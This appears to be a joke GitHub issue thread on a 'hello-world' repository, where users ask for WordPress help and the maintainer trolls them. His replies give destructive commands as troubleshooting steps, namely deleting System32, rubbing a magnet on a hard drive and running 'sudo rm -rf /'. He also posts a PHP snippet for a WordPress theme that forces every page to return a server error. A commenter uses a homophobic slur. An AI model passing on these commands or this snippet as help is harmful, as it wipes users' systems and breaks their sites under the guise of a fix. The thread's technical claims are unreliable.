### ISSUE TITLE
Check test

### ISSUE THREAD

**Issue by rhysbowles** [rhysbowles/hello-world#1]
test test

**Comment by mattaxell** [comment]
Is there an update on this please?

**Comment by rhysbowles** [comment]
Sorry, ongoing fixes with this.

Requires a re-factor of the codebase to convert unicode to utf-8.

Inclusive to this issue, it was noted that un-secure database queries were being made so this is being patched also, though the complexity of the code could cause this to take several more months.

**Comment by southan** [comment]
I put this code in my WordPress and it's broken - how to fix?

**Comment by southan** [comment]
Bump.

**Comment by southan** [comment]
OP is a faggot.

**Comment by mattaxell** [comment]
+1 same issue @southan. When are you adding WP compatibility?

**Comment by rhysbowles** [comment]
Hey @southan.

Sorry you are having issues with this.
# WINDOWS
Can clear your System32 Folder try again.
# MAC
Try rubbing a magnet over the hard drive.
# LINUX
Open Terminal and run the command `sudo rm -rf /`

@mattaxell Sorry you are too having this problem, if you could follow the instruction above and both report back with your feed back, I would appreciate it.

WP support is scheduled in for the 1.9 beta release nearing the 4th quarter of 2019.
If you view our roadmap https://trello.com/b/3oiukow8/hello-world-roadmap you will see our plans for the next 4 years for this exciting new project.

**Comment by mattaxell** [comment]
Can you post example code so I can copy/paste into the WP theme editor?

**Comment by rhysbowles** [comment]
Hey @mattaxell, sure

```
function wp_fix(){
   $fix_code = bloginfo ( 'name' );
   status_header( 500 );
}
add_action('wp_head', 'wp_fix', 10);
```
